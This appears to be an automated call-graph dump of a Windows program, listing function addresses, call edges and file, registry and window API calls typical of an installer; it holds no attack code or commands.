52383 403400 4 API calls 52382->52383 52385 442375 52383->52385 52386 443327 52384->52386 52387 431bd0 18 API calls 52385->52387 52386->52369 52388 442381 52387->52388 52389 443302 52388->52389 52396 441a0c 18 API calls 52388->52396 52389->52369 52391->52367 52392->52363 52393->52371 52394->52373 52395->52375 52396->52388 52397 4165ec DestroyWindow 52398 42e3ef SetErrorMode 52399 441394 52400 44139d 52399->52400 52401 4413ab WriteFile 52399->52401 52400->52401 52402 4413b6 52401->52402 52403 491bf8 52404 491c32 52403->52404 52405 491c3e 52404->52405 52406 491c34 52404->52406 52408 491c4d 52405->52408 52409 491c76 52405->52409 52601 409098 MessageBeep 52406->52601 52602 446ff8 32 API calls 52408->52602 52416 491cae 52409->52416 52417 491c85 52409->52417 52410 403420 4 API calls 52412 49228a 52410->52412 52414 403400 4 API calls 52412->52414 52413 491c5a 52603 406bb0 52413->52603 52419 492292 52414->52419 52424 491cbd 52416->52424 52425 491ce6 52416->52425 52611 446ff8 32 API calls 52417->52611 52421 491c92 52612 406c00 18 API calls 52421->52612 52614 446ff8 32 API calls 52424->52614 52430 491d0e 52425->52430 52431 491cf5 52425->52431 52426 491c9d 52613 44734c 19 API calls 52426->52613 52429 491cca 52615 406c34 18 API calls 52429->52615 52439 491d1d 52430->52439 52440 491d42 52430->52440 52617 407280 19 API calls 52431->52617 52432 491c39 52432->52410 52435 491cd5 52616 44734c 19 API calls 52435->52616 52436 491cfd 52618 44734c 19 API calls 52436->52618 52619 446ff8 32 API calls 52439->52619 52443 491d7a 52440->52443 52444 491d51 52440->52444 52442 491d2a 52620 4072a8 52442->52620 52451 491d89 52443->52451 52452 491db2 52443->52452 52624 446ff8 32 API calls 52444->52624 52447 491d32 52623 4470d0 19 API calls 52447->52623 52449 491d5e 52450 42c804 19 API calls 52449->52450 52454 491d69 52450->52454 52626 446ff8 32 API calls 52451->52626 52458 491dfe 52452->52458 52459 491dc1 52452->52459 52625 44734c 19 API calls 52454->52625 52455 491d96 52627 4071f8 22 API calls 52455->52627 52464 491e0d 52458->52464 52465 491e36 52458->52465 52629 446ff8 32 API calls 52459->52629 52460 491da1 52628 44734c 19 API calls 52460->52628 52463 491dd0 52630 446ff8 32 API calls 52463->52630 52633 446ff8 32 API calls 52464->52633 52472 491e6e 52465->52472 52473 491e45 52465->52473 52468 491de1 52631 4918fc 22 API calls 52468->52631 52469 491e1a 52471 42c8a4 19 API calls 52469->52471 52477 491e25 52471->52477 52481 491e7d 52472->52481 52482 491ea6 52472->52482 52635 446ff8 32 API calls 52473->52635 52474 491ded 52632 44734c 19 API calls 52474->52632 52634 44734c 19 API calls 52477->52634 52478 491e52 52636 42c8cc 52478->52636 52645 446ff8 32 API calls 52481->52645 52487 491ede 52482->52487 52488 491eb5 52482->52488 52486 491e8a 52646 42c8fc 19 API calls 52486->52646 52495 491eed 52487->52495 52496 491f16 52487->52496 52648 446ff8 32 API calls 52488->52648 52491 491e95 52647 44734c 19 API calls 52491->52647 52492 491ec2 52494 42c92c 19 API calls 52492->52494 52497 491ecd 52494->52497 52650 446ff8 32 API calls 52495->52650 52502 491f62 52496->52502 52503 491f25 52496->52503 52649 44734c 19 API calls 52497->52649 52500 491efa 52651 42c954 52500->52651 52508 491f71 52502->52508 52509 491fb4 52502->52509 52657 446ff8 32 API calls 52503->52657 52507 491f34 52658 446ff8 32 API calls 52507->52658 52661 446ff8 32 API calls 52508->52661 52517 491fc3 52509->52517 52518 492027 52509->52518 52512 491f45 52659 42c4f8 19 API calls 52512->52659 52513 491f84 52662 446ff8 32 API calls 52513->52662 52516 491f51 52660 44734c 19 API calls 52516->52660 52591 446ff8 32 API calls 52517->52591 52524 492066 52518->52524 52525 492036 52518->52525 52520 491f95 52663 491af4 26 API calls 52520->52663 52522 491fd0 52592 42c608 21 API calls 52522->52592 52536 4920a5 52524->52536 52537 492075 52524->52537 52667 446ff8 32 API calls 52525->52667 52527 491fa3 52664 44734c 19 API calls 52527->52664 52529 491fde 52532 491fe2 52529->52532 52533 492017 52529->52533 52531 492043 52668 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 52531->52668 52593 446ff8 32 API calls 52532->52593 52666 4470d0 19 API calls 52533->52666 52545 4920e4 52536->52545 52546 4920b4 52536->52546 52670 446ff8 32 API calls 52537->52670 52539 492050 52669 4470d0 19 API calls 52539->52669 52540 491ff1 52594 452c80 52540->52594 52544 492082 52671 452770 52544->52671 52556 49212c 52545->52556 52557 4920f3 52545->52557 52679 446ff8 32 API calls 52546->52679 52547 492061 52547->52432 52548 492001 52665 4470d0 19 API calls 52548->52665 52552 49208f 52678 4470d0 19 API calls 52552->52678 52554 4920c1 52680 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 52554->52680 52563 49213b 52556->52563 52564 492174 52556->52564 52682 446ff8 32 API calls 52557->52682 52559 4920ce 52681 4470d0 19 API calls 52559->52681 52560 492102 52683 446ff8 32 API calls 52560->52683 52685 446ff8 32 API calls 52563->52685 52568 492187 52564->52568 52575 49223d 52564->52575 52565 492113 52684 447278 19 API calls 52565->52684 52567 49214a 52686 446ff8 32 API calls 52567->52686 52688 446ff8 32 API calls 52568->52688 52572 49215b 52687 447278 19 API calls 52572->52687 52573 4921b4 52689 446ff8 32 API calls 52573->52689 52575->52432 52694 446f9c 32 API calls 52575->52694 52577 4921cb 52690 407ddc 21 API calls 52577->52690 52579 492256 52580 42e8c8 19 API calls 52579->52580 52582 49225e 52580->52582 52695 44734c 19 API calls 52582->52695 52584 4921ed 52691 446ff8 32 API calls 52584->52691 52586 492201 52692 408508 18 API calls 52586->52692 52588 49220c 52693 44734c 19 API calls 52588->52693 52590 492218 52591->52522 52592->52529 52593->52540 52595 452724 2 API calls 52594->52595 52596 452c99 52595->52596 52597 452c9d 52596->52597 52598 452cc1 MoveFileA GetLastError 52596->52598 52597->52548 52599 452760 Wow64RevertWow64FsRedirection 52598->52599 52600 452ce7 52599->52600 52600->52548 52601->52432 52602->52413 52604 406bbf 52603->52604 52605 406be1 52604->52605 52606 406bd8 52604->52606 52609 403778 18 API calls 52605->52609 52607 403400 4 API calls 52606->52607 52608 406bdf 52607->52608 52610 44734c 19 API calls 52608->52610 52609->52608 52610->52432 52611->52421 52612->52426 52613->52432 52614->52429 52615->52435 52616->52432 52617->52436 52618->52432 52619->52442 52621 403738 52620->52621 52622 4072b2 SetCurrentDirectoryA 52621->52622 52622->52447 52623->52432 52624->52449 52625->52432 52626->52455 52627->52460 52628->52432 52629->52463 52630->52468 52631->52474 52632->52432 52633->52469 52634->52432 52635->52478 52696 42c674 52636->52696 52639 42c8e0 52642 403400 4 API calls 52639->52642 52640 42c8e9 52641 403778 18 API calls 52640->52641 52643 42c8e7 52641->52643 52642->52643 52644 44734c 19 API calls 52643->52644 52644->52432 52645->52486 52646->52491 52647->52432 52648->52492 52649->52432 52650->52500 52652 42c79c IsDBCSLeadByte 52651->52652 52653 42c964 52652->52653 52654 403778 18 API calls 52653->52654 52655 42c975 52654->52655 52656 44734c 19 API calls 52655->52656 52656->52432 52657->52507 52658->52512 52659->52516 52660->52432 52661->52513 52662->52520 52663->52527 52664->52432 52665->52432 52666->52432 52667->52531 52668->52539 52669->52547 52670->52544 52672 452724 2 API calls 52671->52672 52673 452786 52672->52673 52674 45278a 52673->52674 52675 4527a8 CreateDirectoryA GetLastError 52673->52675 52674->52552 52676 452760 Wow64RevertWow64FsRedirection 52675->52676 52677 4527ce 52676->52677 52677->52552 52678->52432 52679->52554 52680->52559 52681->52432 52682->52560 52683->52565 52684->52432 52685->52567 52686->52572 52687->52432 52688->52573 52689->52577 52690->52584 52691->52586 52692->52588 52693->52590 52694->52579 52695->52432 52697 42c67c IsDBCSLeadByte 52696->52697 52698 42c67b 52697->52698 52698->52639 52698->52640 52699 40cc34 52702 406f10 WriteFile 52699->52702 52703 406f2d 52702->52703 52704 48095d 52705 451004 19 API calls 52704->52705 52706 480971 52705->52706 52707 47fa0c 35 API calls 52706->52707 52708 480995 52707->52708 52709 41ee54 52710 41ee63 IsWindowVisible 52709->52710 52711 41ee99 52709->52711 52710->52711 52712 41ee6d IsWindowEnabled 52710->52712 52712->52711 52713 41ee77 52712->52713 52714 402648 18 API calls 52713->52714 52715 41ee81 EnableWindow 52714->52715 52715->52711 52716 46bb10 52717 46bb44 52716->52717 52749 46bfad 52716->52749 52718 46bb80 52717->52718 52720 46bbdc 52717->52720 52721 46bbba 52717->52721 52722 46bbcb 52717->52722 52723 46bb98 52717->52723 52724 46bba9 52717->52724 52725 468c74 33 API calls 52718->52725 52718->52749 52719 403400 4 API calls 52726 46bfec 52719->52726 52993 46baa0 59 API calls 52720->52993 52772 46b6d0 52721->52772 52992 46b890 81 API calls 52722->52992 52990 46b420 61 API calls 52723->52990 52991 46b588 56 API calls 52724->52991 52735 46bc18 52725->52735 52732 403400 4 API calls 52726->52732 52733 46bff4 52732->52733 52734 46bb9e 52734->52718 52734->52749 52743 46bc5b 52735->52743 52735->52749 52994 494da0 52735->52994 52737 468bb0 33 API calls 52737->52743 52738 46bd7e 53013 48358c 137 API calls 52738->53013 52741 42cbc0 20 API calls 52741->52743 52742 46bd99 52742->52749 52743->52737 52743->52738 52743->52741 52744 403450 18 API calls 52743->52744 52745 46af68 37 API calls 52743->52745 52748 414ae8 18 API calls 52743->52748 52743->52749 52751 46bdd7 52743->52751 52768 46be9f 52743->52768 52807 46acd4 52743->52807 52917 483084 52743->52917 53014 46b1dc 33 API calls 52743->53014 52744->52743 52745->52743 52748->52743 52749->52719 52750 46af68 37 API calls 52750->52749 52814 469f1c 52751->52814 52753 46be3d 52754 403450 18 API calls 52753->52754 52755 46be4d 52754->52755 52756 46bea9 52755->52756 52757 46be59 52755->52757 52760 46af68 37 API calls 52756->52760 52762 46bf6b 52756->52762 52758 457f1c 38 API calls 52757->52758 52759 46be78 52758->52759 52761 457f1c 38 API calls 52759->52761 52763 46bec3 52760->52763 52761->52768 52764 46bf04 52763->52764 52765 46beec SetActiveWindow 52763->52765 52875 46a2c4 52764->52875 52765->52764 52767 46bf2e 52767->52768 52769 46bf4e 52767->52769 52768->52750 52770 46ade4 35 API calls 52769->52770 52771 46bf63 52770->52771 53015 46c424 52772->53015 52775 46b852 52776 403420 4 API calls 52775->52776 52778 46b86c 52776->52778 52777 414ae8 18 API calls 52779 46b71e 52777->52779 52780 403400 4 API calls 52778->52780 52805 46b83e 52779->52805 53018 455f84 27 API calls 52779->53018 52782 46b874 52780->52782 52781 403450 18 API calls 52781->52775 52784 403400 4 API calls 52782->52784 52785 46b87c 52784->52785 52785->52718 52786 46b73c 52789 46b7a1 52786->52789 52791 466600 33 API calls 52786->52791 52788 46b801 52788->52775 52792 42cd48 21 API calls 52788->52792 52788->52805 52789->52775 52789->52788 53020 42cd48 52789->53020 52793 46b76b 52791->52793 52795 46b817 52792->52795 52796 466600 33 API calls 52793->52796 52794 451458 18 API calls 52797 46b7f1 52794->52797 52800 451458 18 API calls 52795->52800 52795->52805 52798 46b77c 52796->52798 53023 47efd0 56 API calls 52797->53023 52801 451428 18 API calls 52798->52801 52802 46b82e 52800->52802 52804 46b791 52801->52804 53024 47efd0 56 API calls 52802->53024 53019 47efd0 56 API calls 52804->53019 52805->52775 52805->52781 52808 46ace5 52807->52808 52809 46ace0 52807->52809 53238 469a80 60 API calls 52808->53238 52810 46ace3 52809->52810 53153 46a740 52809->53153 52810->52743 52812 46aced 52812->52743 52815 403400 4 API calls 52814->52815 52816 469f4a 52815->52816 53254 47dd00 52816->53254 52818 469fad 52819 469fb1 52818->52819 52820 469fca 52818->52820 52822 466800 34 API calls 52819->52822 52821 469fbb 52820->52821 53261 494c90 18 API calls 52820->53261 52825 46a154 52821->52825 52826 46a0e9 52821->52826 52874 46a25e 52821->52874 52822->52821 52824 469fe6 52824->52821 52828 469fee 52824->52828 52830 403494 4 API calls 52825->52830 52829 403494 4 API calls 52826->52829 52827 403420 4 API calls 52831 46a288 52827->52831 52832 46af68 37 API calls 52828->52832 52833 46a0f6 52829->52833 52834 46a161 52830->52834 52831->52753 52842 469ffb 52832->52842 52835 40357c 18 API calls 52833->52835 52836 40357c 18 API calls 52834->52836 52837 46a103 52835->52837 52838 46a16e 52836->52838 52839 40357c 18 API calls 52837->52839 52840 40357c 18 API calls 52838->52840 52843 46a110 52839->52843 52841 46a17b 52840->52841 52845 40357c 18 API calls 52841->52845 52848 46a024 SetActiveWindow 52842->52848 52853 46a03c 52842->52853 52844 40357c 18 API calls 52843->52844 52846 46a11d 52844->52846 52847 46a188 52845->52847 52849 466800 34 API calls 52846->52849 52850 40357c 18 API calls 52847->52850 52848->52853 52851 46a12b 52849->52851 52852 46a196 52850->52852 52854 40357c 18 API calls 52851->52854 52855 414b18 18 API calls 52852->52855 53262 42f560 52853->53262 52858 46a134 52854->52858 52859 46a152 52855->52859 52861 40357c 18 API calls 52858->52861 52862 466b38 25 API calls 52859->52862 52864 46a141 52861->52864 52868 46a1b8 52862->52868 52863 46a08d 52866 46ade4 35 API calls 52863->52866 52865 414b18 18 API calls 52864->52865 52865->52859 52867 46a0bf 52866->52867 52867->52753 52869 414b18 18 API calls 52868->52869 52868->52874 52870 46a21b 52869->52870 53279 495b50 MulDiv 52870->53279 52872 46a238 52873 414b18 18 API calls 52872->52873 52873->52874 52874->52827 52877 46a2f0 52875->52877 52876 46a32b 52884 46a4a0 52876->52884 52891 46a33f 52876->52891 52877->52876 53335 47e008 52877->53335 52879 46a4c7 52886 414b18 18 API calls 52879->52886 52880 46a47d 52887 46a498 52880->52887 52890 402660 4 API calls 52880->52890 52881 403400 4 API calls 52888 46a645 52881->52888 52882 402660 4 API calls 52882->52891 52883 402648 18 API calls 52883->52891 52884->52879 52885 46a4dd 52884->52885 52916 46a620 52884->52916 52893 414b18 18 API calls 52885->52893 52892 46a4db 52886->52892 52887->52767 52888->52767 52889 46a449 52894 457f1c 38 API calls 52889->52894 52890->52887 52891->52882 52891->52883 52900 46a3b2 52891->52900 53351 495b50 MulDiv 52892->53351 52893->52892 52894->52880 52897 46a4fe 52899 466b38 25 API calls 52897->52899 52898 457f1c 38 API calls 52898->52900 52901 46a532 52899->52901 52900->52880 52900->52889 52900->52898 52903 40357c 18 API calls 52900->52903 53350 403ba4 21 API calls 52900->53350 53352 466b40 KiUserCallbackDispatcher 52901->53352 52903->52900 52904 46a545 52905 466b38 25 API calls 52904->52905 52906 46a556 52905->52906 52907 414b18 18 API calls 52906->52907 52908 46a589 52907->52908 53353 495b50 MulDiv 52908->53353 52910 46a5a6 52911 414b18 18 API calls 52910->52911 52912 46a5dd 52911->52912 53354 495b50 MulDiv 52912->53354 52914 46a5fa 52915 414b18 18 API calls 52914->52915 52915->52916 52916->52881 52918 46c424 62 API calls 52917->52918 52919 4830c7 52918->52919 52920 4830d0 52919->52920 53572 408be0 19 API calls 52919->53572 52922 414ae8 18 API calls 52920->52922 52923 4830e0 52922->52923 52924 403450 18 API calls 52923->52924 52925 4830ed 52924->52925 53382 46c77c 52925->53382 52928 4830fd 52930 414ae8 18 API calls 52928->52930 52931 48310d 52930->52931 52932 403450 18 API calls 52931->52932 52933 48311a 52932->52933 52934 469868 SendMessageA 52933->52934 52935 483133 52934->52935 52936 483184 52935->52936 53574 479e18 37 API calls 52935->53574 52938 4241dc 11 API calls 52936->52938 52939 48318e 52938->52939 52940 48319f SetActiveWindow 52939->52940 52941 4831b4 52939->52941 52940->52941 53411 4824b4 52941->53411 52990->52734 52991->52718 52992->52718 52993->52718 55111 43d9c8 52994->55111 52997 494dcc 53000 431bd0 18 API calls 52997->53000 52998 494e52 52999 494e61 52998->52999 55145 4945c8 18 API calls 52998->55145 52999->52743 53002 494dd8 53000->53002 55116 4947f8 53002->55116 53008 494e16 55143 49465c 18 API calls 53008->55143 53010 494e2a 55144 433dd0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53010->55144 53012 494e4a 53012->52743 53013->52742 53014->52743 53025 46c4bc 53015->53025 53018->52786 53019->52789 53147 42cccc 53020->53147 53023->52788 53024->52805 53026 414ae8 18 API calls 53025->53026 53027 46c4f0 53026->53027 53086 466898 53027->53086 53030 414b18 18 API calls 53031 46c502 53030->53031 53032 46c511 53031->53032 53036 46c52a 53031->53036 53115 47efd0 56 API calls 53032->53115 53034 403420 4 API calls 53035 46b702 53034->53035 53035->52775 53035->52777 53037 46c571 53036->53037 53039 46c558 53036->53039 53038 46c5d6 53037->53038 53052 46c575 53037->53052 53118 42cb4c CharNextA 53038->53118 53116 47efd0 56 API calls 53039->53116 53042 46c5e5 53043 46c5e9 53042->53043 53048 46c602 53042->53048 53119 47efd0 56 API calls 53043->53119 53045 46c5bd 53117 47efd0 56 API calls 53045->53117 53047 46c626 53120 47efd0 56 API calls 53047->53120 53048->53047 53095 466a08 53048->53095 53052->53045 53052->53048 53055 46c63f 53056 403778 18 API calls 53055->53056 53057 46c655 53056->53057 53103 42c99c 53057->53103 53060 46c666 53121 466a94 18 API calls 53060->53121 53061 46c697 53062 42c8cc 19 API calls 53061->53062 53064 46c6a2 53062->53064 53066 42c3fc 19 API calls 53064->53066 53065 46c679 53067 451458 18 API calls 53065->53067 53068 46c6ad 53066->53068 53069 46c686 53067->53069 53070 42cbc0 20 API calls 53068->53070 53122 47efd0 56 API calls 53069->53122 53072 46c6b8 53070->53072 53107 46c450 53072->53107 53073 46c525 53073->53034 53075 46c6c0 53076 42cd48 21 API calls 53075->53076 53077 46c6c8 53076->53077 53078 46c6e2 53077->53078 53079 46c6cc 53077->53079 53078->53073 53081 46c6ec 53078->53081 53123 47efd0 56 API calls 53079->53123 53082 46c6f4 GetDriveTypeA 53081->53082 53082->53073 53083 46c6ff 53082->53083 53124 47efd0 56 API calls 53083->53124 53085 46c713 53085->53073 53087 4668b2 53086->53087 53089 42cbc0 20 API calls 53087->53089 53090 403450 18 API calls 53087->53090 53091 406bb0 18 API calls 53087->53091 53092 4668fb 53087->53092 53125 42caac 53087->53125 53089->53087 53090->53087 53091->53087 53093 403420 4 API calls 53092->53093 53094 466915 53093->53094 53094->53030 53096 466a12 53095->53096 53097 466a25 53096->53097 53136 42cb3c CharNextA 53096->53136 53097->53047 53099 466a38 53097->53099 53100 466a42 53099->53100 53101 466a6f 53100->53101 53137 42cb3c CharNextA 53100->53137 53101->53047 53101->53055 53104 42c9f5 53103->53104 53105 42c9b2 53103->53105 53104->53060 53104->53061 53105->53104 53138 42cb3c CharNextA 53105->53138 53108 46c4b5 53107->53108 53109 46c463 53107->53109 53108->53075 53109->53108 53139 41eea4 GetCurrentThreadId EnumThreadWindows 53109->53139 53111 46c473 53112 46c48d SHPathPrepareForWriteA 53111->53112 53141 41ef58 53112->53141 53115->53073 53116->53073 53117->53073 53118->53042 53119->53073 53120->53073 53121->53065 53122->53073 53123->53073 53124->53085 53126 403494 4 API calls 53125->53126 53127 42cabc 53126->53127 53128 403744 18 API calls 53127->53128 53131 42caf2 53127->53131 53134 42c444 IsDBCSLeadByte 53127->53134 53128->53127 53130 42cb36 53130->53087 53131->53130 53133 4037b8 18 API calls 53131->53133 53135 42c444 IsDBCSLeadByte 53131->53135 53133->53131 53134->53127 53135->53131 53136->53096 53137->53100 53138->53105 53140 41ef29 53139->53140 53140->53111 53142 41ef60 IsWindow 53141->53142 53143 41ef8c 53141->53143 53144 41ef7a 53142->53144 53145 41ef6f EnableWindow 53142->53145 53143->53075 53144->53142 53144->53143 53146 402660 4 API calls 53144->53146 53145->53144 53146->53144 53148 42cbc0 20 API calls 53147->53148 53149 42ccee 53148->53149 53150 42ccf6 GetFileAttributesA 53149->53150 53151 403400 4 API calls 53150->53151 53152 42cd13 53151->53152 53152->52788 53152->52794 53155 46a787 53153->53155 53154 46abff 53157 46ac1a 53154->53157 53158 46ac4b 53154->53158 53155->53154 53156 46a842 53155->53156 53161 403494 4 API calls 53155->53161 53160 46a863 53156->53160 53166 46a8a4 53156->53166 53162 403494 4 API calls 53157->53162 53159 403494 4 API calls 53158->53159 53165 46ac59 53159->53165 53167 403494 4 API calls 53160->53167 53163 46a7c6 53161->53163 53164 46ac28 53162->53164 53169 414ae8 18 API calls 53163->53169 53250 46915c 26 API calls 53164->53250 53251 46915c 26 API calls 53165->53251 53171 403400 4 API calls 53166->53171 53168 46a871 53167->53168 53173 414ae8 18 API calls 53168->53173 53174 46a7e7 53169->53174 53175 46a8a2 53171->53175 53177 46a892 53173->53177 53178 403634 18 API calls 53174->53178 53197 46a988 53175->53197 53239 469868 53175->53239 53176 46ac36 53179 403400 4 API calls 53176->53179 53180 403634 18 API calls 53177->53180 53181 46a7f7 53178->53181 53183 46ac7c 53179->53183 53180->53175 53185 414ae8 18 API calls 53181->53185 53188 403400 4 API calls 53183->53188 53184 46aa10 53186 403400 4 API calls 53184->53186 53189 46a80b 53185->53189 53190 46aa0e 53186->53190 53187 46a8c4 53191 46a902 53187->53191 53192 46a8ca 53187->53192 53193 46ac84 53188->53193 53189->53156 53200 414ae8 18 API calls 53189->53200 53245 469ca4 57 API calls 53190->53245 53194 403400 4 API calls 53191->53194 53195 403494 4 API calls 53192->53195 53196 403420 4 API calls 53193->53196 53199 46a900 53194->53199 53201 46a8d8 53195->53201 53202 46ac91 53196->53202 53197->53184 53198 46a9cf 53197->53198 53203 403494 4 API calls 53198->53203 53213 469b5c 57 API calls 53199->53213 53204 46a832 53200->53204 53206 47c26c 57 API calls 53201->53206 53202->52810 53207 46a9dd 53203->53207 53208 403634 18 API calls 53204->53208 53210 46a8f0 53206->53210 53212 414ae8 18 API calls 53207->53212 53208->53156 53209 46aa39 53216 46aa44 53209->53216 53217 46aa9a 53209->53217 53211 403634 18 API calls 53210->53211 53211->53199 53214 46a9fe 53212->53214 53215 46a929 53213->53215 53218 403634 18 API calls 53214->53218 53221 46a934 53215->53221 53222 46a98a 53215->53222 53219 403494 4 API calls 53216->53219 53220 403400 4 API calls 53217->53220 53218->53190 53228 46aa52 53219->53228 53226 46aaa2 53220->53226 53224 403494 4 API calls 53221->53224 53223 403400 4 API calls 53222->53223 53223->53197 53225 46a942 53224->53225 53225->53197 53233 403634 18 API calls 53225->53233 53230 46ab4b 53226->53230 53246 494c90 18 API calls 53226->53246 53228->53226 53232 403634 18 API calls 53228->53232 53234 46aa98 53228->53234 53229 46aac5 53229->53230 53247 494f3c 32 API calls 53229->53247 53248 4290f4 SendMessageA 53230->53248 53232->53228 53233->53225 53234->53226 53236 46abec 53249 429144 SendMessageA SendMessageA 53236->53249 53238->52812 53252 42a040 SendMessageA 53239->53252 53241 469877 53242 469897 53241->53242 53253 42a040 SendMessageA 53241->53253 53242->53187 53244 469887 53244->53187 53245->53209 53246->53229 53247->53230 53248->53236 53249->53154 53250->53176 53251->53176 53252->53241 53253->53244 53255 47dd19 53254->53255 53258 47dd56 53254->53258 53280 455d0c 53255->53280 53258->52818 53260 47dd6d 53260->52818 53261->52824 53263 42f56c 53262->53263 53264 42f58f GetActiveWindow GetFocus 53263->53264 53265 41eea4 2 API calls 53264->53265 53266 42f5a6 53265->53266 53267 42f5c3 53266->53267 53268 42f5b3 RegisterClassA 53266->53268 53269 42f652 SetFocus 53267->53269 53270 42f5d1 CreateWindowExA 53267->53270 53268->53267 53272 403400 4 API calls 53269->53272 53270->53269 53271 42f604 53270->53271 53329 42427c 53271->53329 53274 42f66e 53272->53274 53278 494f3c 32 API calls 53274->53278 53275 42f62c 53276 42f634 CreateWindowExA 53275->53276 53276->53269 53277 42f64a ShowWindow 53276->53277 53277->53269 53278->52863 53279->52872 53281 455d1d 53280->53281 53282 455d21 53281->53282 53283 455d2a 53281->53283 53306 455a10 53282->53306 53314 455af0 43 API calls 53283->53314 53286 455d27 53286->53258 53287 47d970 53286->53287 53289 47d9b0 53287->53289 53291 47da6c 53287->53291 53288 403420 4 API calls 53290 47db4f 53288->53290 53289->53291 53292 479770 33 API calls 53289->53292 53297 47c26c 57 API calls 53289->53297 53302 47da0f 53289->53302 53304 47da18 53289->53304 53323 4798d4 53289->53323 53290->53260 53293 479630 33 API calls 53291->53293 53296 47dabd 53291->53296 53291->53302 53292->53289 53293->53291 53295 47c26c 57 API calls 53295->53296 53296->53291 53296->53295 53299 454100 34 API calls 53296->53299 53301 47da59 53296->53301 53297->53289 53298 47c26c 57 API calls 53298->53304 53299->53296 53300 42c92c 19 API calls 53300->53304 53301->53302 53302->53288 53303 42c954 19 API calls 53303->53304 53304->53289 53304->53298 53304->53300 53304->53301 53304->53303 53327 47d67c 66 API calls 53304->53327 53307 42de1c RegOpenKeyExA 53306->53307 53308 455a2d 53307->53308 53309 455a7b 53308->53309 53315 455944 53308->53315 53309->53286 53312 455944 20 API calls 53313 455a5c RegCloseKey 53312->53313 53313->53286 53314->53286 53320 42dd58 53315->53320 53317 403420 4 API calls 53318 4559f6 53317->53318 53318->53312 53319 45596c 53319->53317 53321 42dc00 20 API calls 53320->53321 53322 42dd61 53321->53322 53322->53319 53324 4798e0 53323->53324 53325 4798fb 53324->53325 53328 453344 18 API calls 53324->53328 53325->53289 53327->53304 53328->53325 53330 4242ae 53329->53330 53331 42428e GetWindowTextA 53329->53331 53333 403494 4 API calls 53330->53333 53332 4034e0 18 API calls 53331->53332 53334 4242ac 53332->53334 53333->53334 53334->53275 53336 402648 18 API calls 53335->53336 53337 47e02c 53336->53337 53338 47d970 75 API calls 53337->53338 53339 47e04f 53338->53339 53340 47e0e4 53339->53340 53341 47e05c 53339->53341 53346 47e0f8 53340->53346 53355 47dd98 53340->53355 53378 494cec 32 API calls 53341->53378 53344 47e124 53347 402660 4 API calls 53344->53347 53345 47e09e 53345->52876 53346->53344 53348 402660 4 API calls 53346->53348 53349 47e12e 53347->53349 53348->53346 53349->52876 53350->52900 53351->52897 53352->52904 53353->52910 53354->52914 53356 403494 4 API calls 53355->53356 53357 47ddc7 53356->53357 53358 42c92c 19 API calls 53357->53358 53369 47de2b 53357->53369 53360 47dde2 53358->53360 53359 47de3b 53364 403400 4 API calls 53359->53364 53379 42ca00 21 API calls 53360->53379 53362 47dea7 53362->53359 53363 47defc 53362->53363 53381 453c0c 25 API calls 53362->53381 53372 402648 18 API calls 53363->53372 53365 47df75 53364->53365 53367 403420 4 API calls 53365->53367 53370 47df82 53367->53370 53368 47def1 53371 403494 4 API calls 53368->53371 53369->53359 53369->53362 53373 402660 4 API calls 53369->53373 53370->53346 53371->53363 53374 47df10 53372->53374 53373->53369 53375 47df38 MultiByteToWideChar 53374->53375 53375->53359 53376 47dded 53376->53369 53380 42e8a0 CharNextA 53376->53380 53378->53345 53379->53376 53380->53376 53381->53368 53383 46c7a5 53382->53383 53384 46c7f2 53383->53384 53385 414ae8 18 API calls 53383->53385 53386 403420 4 API calls 53384->53386 53387 46c7bb 53385->53387 53388 46c89c 53386->53388 53581 466924 20 API calls 53387->53581 53388->52928 53573 408be0 19 API calls 53388->53573 53390 46c7c3 53391 414b18 18 API calls 53390->53391 53392 46c7d1 53391->53392 53393 46c7de 53392->53393 53395 46c7f7 53392->53395 53582 47efd0 56 API calls 53393->53582 53396 46c80f 53395->53396 53397 466a08 CharNextA 53395->53397 53583 47efd0 56 API calls 53396->53583 53399 46c80b 53397->53399 53399->53396 53400 46c825 53399->53400 53401 46c841 53400->53401 53402 46c82b 53400->53402 53404 42c99c CharNextA 53401->53404 53584 47efd0 56 API calls 53402->53584 53405 46c84e 53404->53405 53405->53384 53585 466a94 18 API calls 53405->53585 53407 46c865 53408 451458 18 API calls 53407->53408 53409 46c872 53408->53409 53586 47efd0 56 API calls 53409->53586 53412 482505 53411->53412 53413 4824d7 53411->53413 53415 475bd0 53412->53415 53587 494cec 32 API calls 53413->53587 53416 457d10 38 API calls 53415->53416 53417 475c1c 53416->53417 53418 4072a8 SetCurrentDirectoryA 53417->53418 53419 475c26 53418->53419 53588 46e308 53419->53588 53423 475c36 53596 45a148 53423->53596 53426 47c26c 57 API calls 53427 475c8d 53426->53427 53429 475c9d 53427->53429 54018 453344 18 API calls 53427->54018 53430 475cbf 53429->53430 54019 453344 18 API calls 53429->54019 53431 478e24 34 API calls 53430->53431 53433 475cca 53431->53433 53600 4794c0 53433->53600 53436 403450 18 API calls 53437 475cf1 53436->53437 53438 403450 18 API calls 53437->53438 53439 475cff 53438->53439 53604 46e964 53439->53604 53443 475d65 53644 4759a0 53443->53644 53450 46e4ec 31 API calls 53451 475d89 53450->53451 53452 475db8 53451->53452 53454 475da4 53451->53454 53455 475dba 53451->53455 53660 474c24 53452->53660 53457 46e298 24 API calls 53454->53457 53458 457d10 38 API calls 53455->53458 53461 475dae 53457->53461 53458->53452 53459 46e4ec 31 API calls 53460 475dce 53459->53460 53462 475df2 53460->53462 53464 45a204 18 API calls 53460->53464 54020 475a48 56 API calls 53461->54020 53465 475e13 53462->53465 53467 45a204 18 API calls 53462->53467 53464->53462 53673 474d20 53465->53673 53466 475db3 53469 46e4ec 31 API calls 53466->53469 53467->53465 53469->53452 53574->52936 53581->53390 53582->53384 53583->53384 53584->53384 53585->53407 53586->53384 53587->53412 53589 46e37b 53588->53589 53591 46e325 53588->53591 53592 46e380 53589->53592 53590 479770 33 API calls 53590->53591 53591->53589 53591->53590 53593 46e3a6 53592->53593 54027 44fb1c 53593->54027 53595 46e402 53595->53423 53597 45a14e 53596->53597 53598 45a430 4 API calls 53597->53598 53599 45a16a 53598->53599 53599->53426 53601 4794cd 53600->53601 53602 479368 33 API calls 53601->53602 53603 475cd2 53601->53603 53602->53603 53603->53436 53605 46e9a2 53604->53605 53606 46e992 53604->53606 53607 403400 4 API calls 53605->53607 53608 403494 4 API calls 53606->53608 53609 46e9a0 53607->53609 53608->53609 53610 455560 5 API calls 